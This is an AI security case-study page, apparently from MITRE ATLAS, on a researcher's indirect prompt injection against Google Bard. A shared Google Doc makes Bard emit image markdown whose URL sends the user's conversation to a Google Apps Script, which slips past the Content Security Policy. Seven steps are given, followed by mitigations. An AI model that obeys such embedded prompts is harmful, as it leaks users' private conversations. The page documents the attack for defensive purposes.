Google Bard Conversation Exfiltration - AI Case Study

AI Case Study

Embrace the Red demonstrated that Bard users' conversations could be exfiltrated via an indirect prompt injection. To execute the attack, a threat actor shares a Google Doc containing the prompt with the target user who then interacts with the document via Bard to inadvertently execute the prompt. The prompt causes Bard to respond with the markdown for an image, whose URL has the...

Overview

Case steps7Steps described in the case record.

Techniques7Attack methods mentioned in the case steps.

Linked CVEs0Known vulnerabilities mentioned in the record.

Risk patterns

Patterns found in the case record and its linked vulnerabilities.

1Dominant ATLAS tactic. Resource Development appears in 3 case steps.
2Multiple attack methods. The case connects to 7 unique AI attack methods.

Procedure timeline

Search the case steps or filter them by attacker goal.

Resource Development3Initial Access1Execution1Exfiltration1Impact1

Step 1
LLM Prompt Crafting
Resource Development

The researcher developed a prompt that causes Bard to include a Markdown element for an image with the user's conversation embedded in the URL as part of its responses.
Step 2
Acquire Infrastructure
Resource Development

The researcher identified that Google Apps Scripts can be invoked via a URL on script.google.com or googleusercontent.com and can be configured to not require authentication. This allows a script to be invoked without triggering Bard's Content Security Policy.
Step 3
Develop Capabilities
Resource Development

The researcher wrote a Google Apps Script that logs all query parameters to a Google Doc.
Step 4
Prompt Infiltration via Public-Facing Application
Initial Access

The researcher shares a Google Doc containing the malicious prompt with the target user. This exploits the fact that Bard Extensions allow Bard to access a user's documents.
Step 5
Indirect
Execution

When the user makes a query that results in the document being retrieved, the embedded prompt is executed. The malicious prompt causes Bard to respond with markdown for an image whose URL points to the researcher's Google App Script with the user's conversation in a query parameter.
Step 6
LLM Response Rendering
Exfiltration

Bard automatically renders the markdown, which sends the request to the Google App Script, exfiltrating the user's conversation. This is allowed by Bard's Content Security Policy because the URL is hosted on a Google-owned domain.
Step 7
User Harm
Impact

The user's conversation is exfiltrated, violating their privacy, and possibly enabling further targeted attacks.

Mitigations

Defenses connected to the attack methods in this case.

2 recordsView all mitigations →

AI Telemetry Logging

Implement logging of inputs and outputs of deployed AI models. When deploying AI agents, implement logging of the intermediate steps of agentic actions and decisions, data access and tool use, installation commands, and identity of the agent. Monitoring logs can help to detect security threats and mitigate impacts.

Additionally, having logging enabled can discourage adversaries who want to remain undetected from utilizing AI resources.

Input and Output Validation for AI Agent Components

Implement validation on inputs and outputs for the tools and data sources used by AI agents. Validation includes enforcing a common data format, schema validation, checks for sensitive or prohibited information leakage, and data sanitization to remove potential injections or unsafe code. Input and output validation can help prevent compromises from spreading in AI-enabled systems and can help secure the workflow when multiple components are chained together. Validation should be performed external to the AI agent.

Source evidence

Original public records and references for this case.

View all sources →

Original source

Original source links

Open the MITRE ATLAS data and public references used for this case study.

Repositoryhttps://github.com/mitre-atlas/atlas-data ATLAS.yamlhttps://github.com/mitre-atlas/atlas-data/blob/main/dist/ATLAS.yaml Schemahttps://github.com/mitre-atlas/atlas-data/blob/main/dist/schemas/atlas_output_schema.json Hacking Google Bard - From Prompt Injection to Data Exfiltrationhttps://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/